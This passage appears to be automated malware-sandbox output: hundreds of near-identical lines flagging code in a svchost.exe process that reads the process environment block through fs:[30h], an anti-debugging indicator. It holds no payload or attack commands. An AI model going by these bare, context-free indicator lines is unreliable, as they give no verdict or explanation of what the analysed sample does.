            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034666B0 mov eax, dword ptr fs:[00000030h]2_2_034666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6500 mov eax, dword ptr fs:[00000030h]2_2_034C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]2_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]2_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034365D0 mov eax, dword ptr fs:[00000030h]2_2_034365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]2_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]2_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034325E0 mov eax, dword ptr fs:[00000030h]2_2_034325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]2_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]2_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432582 mov eax, dword ptr fs:[00000030h]2_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432582 mov ecx, dword ptr fs:[00000030h]2_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464588 mov eax, dword ptr fs:[00000030h]2_2_03464588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E59C mov eax, dword ptr fs:[00000030h]2_2_0346E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]2_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]2_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA456 mov eax, dword ptr fs:[00000030h]2_2_034EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342645D mov eax, dword ptr fs:[00000030h]2_2_0342645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345245A mov eax, dword ptr fs:[00000030h]2_2_0345245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC460 mov ecx, dword ptr fs:[00000030h]2_2_034BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C427 mov eax, dword ptr fs:[00000030h]2_2_0342C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A430 mov eax, dword ptr fs:[00000030h]2_2_0346A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034304E5 mov ecx, dword ptr fs:[00000030h]2_2_034304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA49A mov eax, dword ptr fs:[00000030h]2_2_034EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034364AB mov eax, dword ptr fs:[00000030h]2_2_034364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034644B0 mov ecx, dword ptr fs:[00000030h]2_2_034644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BA4B0 mov eax, dword ptr fs:[00000030h]2_2_034BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]2_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]2_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]2_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]2_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FAB40 mov eax, dword ptr fs:[00000030h]2_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D8B42 mov eax, dword ptr fs:[00000030h]2_2_034D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428B50 mov eax, dword ptr fs:[00000030h]2_2_03428B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEB50 mov eax, dword ptr fs:[00000030h]2_2_034DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342CB7E mov eax, dword ptr fs:[00000030h]2_2_0342CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504B00 mov eax, dword ptr fs:[00000030h]2_2_03504B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]2_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]2_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]2_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]2_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEBD0 mov eax, dword ptr fs:[00000030h]2_2_034DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EBFC mov eax, dword ptr fs:[00000030h]2_2_0345EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BCBF0 mov eax, dword ptr fs:[00000030h]2_2_034BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]2_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]2_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]2_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]2_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]2_2_03440A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]2_2_03440A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEA60 mov eax, dword ptr fs:[00000030h]2_2_034DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]2_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]2_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BCA11 mov eax, dword ptr fs:[00000030h]2_2_034BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA24 mov eax, dword ptr fs:[00000030h]2_2_0346CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EA2E mov eax, dword ptr fs:[00000030h]2_2_0345EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]2_2_03454A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]2_2_03454A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA38 mov eax, dword ptr fs:[00000030h]2_2_0346CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430AD0 mov eax, dword ptr fs:[00000030h]2_2_03430AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]2_2_03464AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]2_2_03464AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]2_2_0346AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]2_2_0346AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504A80 mov eax, dword ptr fs:[00000030h]2_2_03504A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468A90 mov edx, dword ptr fs:[00000030h]2_2_03468A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]2_2_03438AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]2_2_03438AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486AA4 mov eax, dword ptr fs:[00000030h]2_2_03486AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0946 mov eax, dword ptr fs:[00000030h]2_2_034B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504940 mov eax, dword ptr fs:[00000030h]2_2_03504940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]2_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov edx, dword ptr fs:[00000030h]2_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]2_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]2_2_034D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]2_2_034D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC97C mov eax, dword ptr fs:[00000030h]2_2_034BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]2_2_034AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]2_2_034AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC912 mov eax, dword ptr fs:[00000030h]2_2_034BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]2_2_03428918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]2_2_03428918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B892A mov eax, dword ptr fs:[00000030h]2_2_034B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C892B mov eax, dword ptr fs:[00000030h]2_2_034C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C69C0 mov eax, dword ptr fs:[00000030h]2_2_034C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034649D0 mov eax, dword ptr fs:[00000030h]2_2_034649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA9D3 mov eax, dword ptr fs:[00000030h]2_2_034FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE9E0 mov eax, dword ptr fs:[00000030h]2_2_034BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]2_2_034629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]2_2_034629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]2_2_034309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]2_2_034309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov esi, dword ptr fs:[00000030h]2_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]2_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]2_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03442840 mov ecx, dword ptr fs:[00000030h]2_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460854 mov eax, dword ptr fs:[00000030h]2_2_03460854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]2_2_03434859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]2_2_03434859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]2_2_034BE872
